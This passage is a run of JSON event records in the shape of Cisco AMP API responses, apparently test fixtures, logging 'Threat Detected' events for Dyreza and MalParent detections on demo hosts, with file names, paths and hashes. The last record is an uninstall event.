Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
